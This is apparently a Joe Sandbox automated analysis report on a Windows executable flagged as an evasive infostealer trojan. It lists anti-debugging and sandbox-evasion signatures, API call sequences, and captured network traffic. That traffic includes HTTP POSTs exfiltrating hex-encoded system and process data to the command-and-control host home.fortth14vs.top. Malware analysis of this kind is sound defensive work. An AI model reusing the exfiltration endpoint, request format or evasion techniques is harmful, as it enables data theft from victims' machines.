Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZN34wF8WI2.exe

Overview

General Information

Sample name:ZN34wF8WI2.exe
renamed because original name is a hash value
Original sample name:e08249e8fc2ed51351908219f021fb0e.exe
Analysis ID:1582693
MD5:e08249e8fc2ed51351908219f021fb0e
SHA1:c8e88594280d1f80feccc811bed7ce03eda5286b
SHA256:36203748faebc1b01f1450c5b93bd31d21b9f98d1e5df663f8a5451c4553dc71
Tags:exeuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ZN34wF8WI2.exe (PID: 6040 cmdline: "C:\Users\user\Desktop\ZN34wF8WI2.exe" MD5: E08249E8FC2ED51351908219F021FB0E)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: ZN34wF8WI2.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: ZN34wF8WI2.exeReversingLabs: Detection: 47%
Source: ZN34wF8WI2.exeVirustotal: Detection: 51%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: ZN34wF8WI2.exeJoe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: -----BEGIN PUBLIC KEY-----5_2_0043DCF0
Source: ZN34wF8WI2.exeBinary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [ebp+04h], 424D53FFh5_2_0047A5B0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [edi+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [esi+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: mov dword ptr [ebx+04h], 424D53FFh5_2_0047B560
Source: ZN34wF8WI2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_0041255D
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004129FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_004129FF
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 560612Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 33 33 35 34 34 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 31Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "0", "data": "Done1" }
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DA870 recv,5_2_004DA870
Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global trafficHTTP traffic detected: GET /gduZhxVRrNSTmMahdBGb1735537738?argument=0 HTTP/1.1Host: home.fortth14vs.topAccept: */*
Source: global trafficDNS traffic detected: DNS query: httpbin.org
Source: global trafficDNS traffic detected: DNS query: home.fortth14vs.top
Source: unknownHTTP traffic detected: POST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1Host: home.fortth14vs.topAccept: */*Content-Type: application/jsonContent-Length: 560612Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 35 39 38 32 31 37 36 35 32 39 31 34 33 33 35 34 34 39 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 30 34 20 7d 2c
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:44:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global trafficHTTP traffic detected: HTTP/1.1 404 NOT FOUNDServer: nginx/1.22.1Date: Tue, 31 Dec 2024 08:44:20 GMTContent-Type: text/html; charset=utf-8Content-Length: 207Connection: closeData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.css
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://.jpg
Source: ZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZ
Source: ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
Source: ZN34wF8WI2.exe, 00000005.00000002.1416710655.00000000019C9000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395528056.00000000019C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1
Source: ZN34wF8WI2.exe, 00000005.00000003.1394939615.00000000019D3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: http://html4/loose.dtd
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/alt-svc.html
Source: ZN34wF8WI2.exeString found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/hsts.html
Source: ZN34wF8WI2.exeString found in binary or memory: https://curl.se/docs/hsts.html#
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://curl.se/docs/http-cookies.html
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ip
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmpString found in binary or memory: https://httpbin.org/ipbefore
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704

System Summary

barindex
PE file contains section with special chars
Source: ZN34wF8WI2.exeStatic PE information: section name:
Source: ZN34wF8WI2.exeStatic PE information: section name: .idata
Source: ZN34wF8WI2.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A407385_3_01A40738
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A407385_3_01A40738
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A4E5BC5_3_01A4E5BC
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A407385_3_01A40738
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_3_01A407385_3_01A40738
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004205B05_2_004205B0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00426FA05_2_00426FA0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0044F1005_2_0044F100
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DB1805_2_004DB180
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0079E0505_2_0079E050
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0079A0005_2_0079A000
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004E00E05_2_004E00E0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004762105_2_00476210
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DC3205_2_004DC320
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DE3E05_2_004DE3E0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007644105_2_00764410
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004E04205_2_004E0420
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041E6205_2_0041E620
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DC7705_2_004DC770
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007767305_2_00776730
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0047A7F05_2_0047A7F0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007947805_2_00794780
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004249405_2_00424940
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041A9605_2_0041A960
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004CC9005_2_004CC900
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_005E6AC05_2_005E6AC0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_006CAAC05_2_006CAAC0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_005A4B605_2_005A4B60
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_006CAB2C5_2_006CAB2C
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00788BF05_2_00788BF0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041CBB05_2_0041CBB0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0079CC905_2_0079CC90
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00794D405_2_00794D40
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_005D0D805_2_005D0D80
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0078CD805_2_0078CD80
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0072AE305_2_0072AE30
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00434F705_2_00434F70
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004DEF905_2_004DEF90
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004D8F905_2_004D8F90
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00762F905_2_00762F90
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004210E65_2_004210E6
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0077D4305_2_0077D430
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007835B05_2_007835B0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007A17A05_2_007A17A0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004C98805_2_004C9880
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_007699205_2_00769920
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00793A705_2_00793A70
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00451BE05_2_00451BE0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00781BD05_2_00781BD0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00777CC05_2_00777CC0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_006C9C805_2_006C9C80
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00425DB05_2_00425DB0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_00423ED05_2_00423ED0
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 004171E0 appears 47 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 0041CAA0 appears 63 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 004F44A0 appears 72 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 00454FD0 appears 264 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 005ECBC0 appears 101 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 004173F0 appears 113 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 0041C960 appears 36 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 004175A0 appears 666 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 005C7220 appears 101 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 00454F40 appears 334 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 0042CCD0 appears 55 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 00455340 appears 50 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 004550A0 appears 100 times
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: String function: 0042CD40 appears 73 times
Source: ZN34wF8WI2.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: ZN34wF8WI2.exeStatic PE information: Section: aapkfxsh ZLIB complexity 0.9946660368424814
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@9/2
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_0041255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses,5_2_0041255D
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeCode function: 5_2_004129FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,5_2_004129FF
